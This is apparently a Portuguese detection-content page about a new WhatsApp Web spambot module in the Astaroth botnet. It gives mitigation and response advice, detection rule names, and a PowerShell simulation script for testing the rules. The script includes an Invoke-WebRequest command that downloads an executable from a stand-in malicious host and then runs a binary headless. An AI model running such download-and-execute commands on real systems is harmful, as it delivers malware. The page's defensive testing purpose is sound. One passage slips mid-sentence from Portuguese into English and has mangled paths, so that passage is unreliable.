Astaroth Adiciona um Novo Componente de Spambot para Campanhas de Email
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os operadores da botnet Astaroth adicionaram um novo componente spambot do WhatsApp Web para expandir seu alcance no ecossistema de eCrime da América Latina. O módulo usa automação de navegador sem cabeça para transformar vítimas comprometidas em nós de distribuição, enviando mensagens maliciosas para seus contatos do WhatsApp. Este desenvolvimento marca uma mudança do spam de e-mail tradicional para plataformas de mensagens sociais.
Investigação
A investigação incluiu uma análise técnica detalhada do spambot Astaroth, descobrindo criptografia AES-CTS, um processo complexo de ofuscação de strings em seis etapas e estruturas de configuração personalizadas. Os pesquisadores identificaram semelhanças substanciais de código entre os spambots Astaroth e Vareg, sugerindo desenvolvedores compartilhados ou acordos de intercâmbio de código. A análise também confirmou o abuso de frameworks legítimos de automação de navegador, incluindo WebDriver e WPPConnect/WA-JS, para executar campanhas de spam ocultas.
Mitigação
As organizações devem educar os usuários sobre engenharia social baseada em WhatsApp e desencorajá-los a abrir ou executar arquivos recebidos de contatos desconhecidos. As proteções de download de navegador devem ser ativadas, enquanto downloads e execuções não autorizadas do WebDriver devem ser rigorosamente monitorados. As equipes de segurança também devem observar a criação suspeita de diretórios na pasta Temp do Windows e considerar bloquear o WPPConnect/WA-JS quando não for necessário para o uso legítimo de negócios.
Resposta
Se atividade do Astaroth for detectada, os endpoints afetados devem ser isolados imediatamente para interromper a propagação adicional de spam e entrega de malware. Os investigadores devem procurar por processos de navegador sem cabeça e por diretórios inusitados ChromeAuto_ dentro de C:UsersPublicTemp. Os processos identificados do WebDriver devem ser submetidos a análise forense, e as atividades de rede devem ser revisadas para conexões não autorizadas com infraestrutura conhecida de C2 do Astaroth.
Fluxo de Ataque
Detecções
Comando e Controle Suspeito por Solicitação de DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Visualizar
IOCs (HashSha256) para detectar: Dentro do Novo Componente Spambot do Astaroth
Visualizar
Detecção de Atividade do WebDriver do Spambot Astaroth [Criação de Processo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Check Preliminar de Telemetria & Linha de Base deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa & Comandos do Ataque: O adversário pretende implantar um módulo de spam automatizado no WhatsApp. Para isso, primeiro usam uma técnica de “vivendo da terra”, utilizando o PowerShell para baixar um específico
binário do WebDriver para um diretório local. Uma vez que a ferramenta está presente, o adversário executa o binário usando osbinary to a local directory. Once the tool is present, the adversary executes the binary using the--headlessand--disable-infobarsflags. Isso permite que a automação seja executada em segundo plano, invisível para o usuário, facilitando a campanha de spam enquanto minimiza a presença no host. -
Script de Teste de Regressão:
# Script de Simulação do Spambot Astaroth # Este script simula a sequência de download e execução definida na regra de detecção. $workDir = "$env:TEMPWebDriverSimulation" if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory } Set-Location $workDir # 1. Simular Download (Aciona selection_webdriver_download) Write-Host "[+] Simulando download do WebDriver via PowerShell..." $dummyWebDriver = "WebDriver.exe" New-Item -Path $dummyWebDriver -ItemType File # Imitando a linha de comando que a regra procura powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'" # 2. Simular Execução (Aciona selection_webdriver_execution e selection_session_creation) Write-Host "[+] Simulando execução do WebDriver com flags sem cabeçalho..." # Usamos Start-Process para garantir que a linha de comando seja capturada como um evento de criação de processo Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow -
Comandos de Limpeza:
# Limpar artefatos de simulação Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force Write-Host "[+] Limpeza completa."